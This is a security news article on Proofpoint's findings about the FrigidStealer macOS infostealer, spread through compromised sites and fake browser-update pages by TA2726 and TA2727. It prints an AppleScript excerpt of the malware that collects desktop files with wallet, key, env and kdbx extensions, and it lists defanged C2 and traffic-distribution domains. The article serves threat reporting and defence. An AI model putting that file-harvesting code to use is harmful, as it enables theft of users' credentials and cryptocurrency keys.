Security researchers at Proofpoint have uncovered a sophisticated web inject campaign targeting MacOS users with a new information-stealing malware called FrigidStealer.
The operation involves two newly identified threat actors, TA2726 and TA2727, collaborating to compromise legitimate websites and redirect victims to fake browser update pages.
This marks a significant escalation in attacks against MacOS devices, which have traditionally faced fewer threats than Windows systems.
The attack chain begins when TA2726, a traffic distribution service (TDS) operator, injects malicious JavaScript into compromised websites.
This script redirects visitors based on geographic location and device type. North American users are funneled to TA569’s SocGholish malware, while European and Asian traffic is directed to TA2727’s payload delivery system.
For Mac users, researchers at Proofpoint noted that this results in a tailored attack: Safari or Chrome users see forged update prompts that download FrigidStealer via weaponized DMG files.
.webp)
Breakdown of FrigidStealer’s Execution
The malware employs advanced social engineering tactics, using WailsIO frameworks to render browser-like interfaces that mimic legitimate installers.
Victims receive instructions to right-click and “Open” the malicious application, bypassing macOS Gatekeeper protections. Upon execution, FrigidStealer leverages AppleScript to harvest critical data:-
set extensionsList to {"txt", "docx", "rtf", "doc", "wallet", "keys", "key", "env", "md", "kdbx"}
try
set desktopFiles to every file of desktop
repeat with aFile in desktopFiles
try
set fileExtension to name extension of aFile
if fileExtension is in extensionsList then
set fileSize to size of aFile
if fileSize < 51200 then
duplicate aFile to folder fileGrabberFolderPath with replacing
delay 1
end if
end if
end try
end repeat
end tryCode snippet showing FrigidStealer’s logic for stealing cryptocurrency keys and documents.
The malware exfiltrates Safari/Chrome cookies, Apple Notes databases, and files with extensions associated with passwords (.wallet, .kdbx) to the C2 domain askforupdate[.]org.
TA2727 coordinates payload delivery through domains like deski[.]fastcloudcdn[.]com, which serve geographically filtered scripts to Windows, Android, and Mac users.
Security teams should prioritize detecting traffic to TA2726’s TDS infrastructure (blackshelter[.]org, rednosehorse[.]com) and monitor for suspicious AppleScript activity.
Proofpoint’s Emerging Threats ruleset now includes signatures to block these domains, while endpoint solutions must scrutinize ad-hoc signed binaries claiming to be browser updaters.
.webp)
As organizations harden email defenses, threat actors increasingly exploit compromised websites and abused CDNs to bypass traditional security perimeters.
Regular patching, user education about fake updates, and restricting unsigned application executions remain critical defenses against these evolving threats.
Free Webinar: Better SOC with Interactive Malware Sandbox for Incident Response, and Threat Hunting – Register Here
.webp?w=100&resize=100,70&ssl=1 "Top 10 Best Autonomous Endpoint Management Tools in 2025")
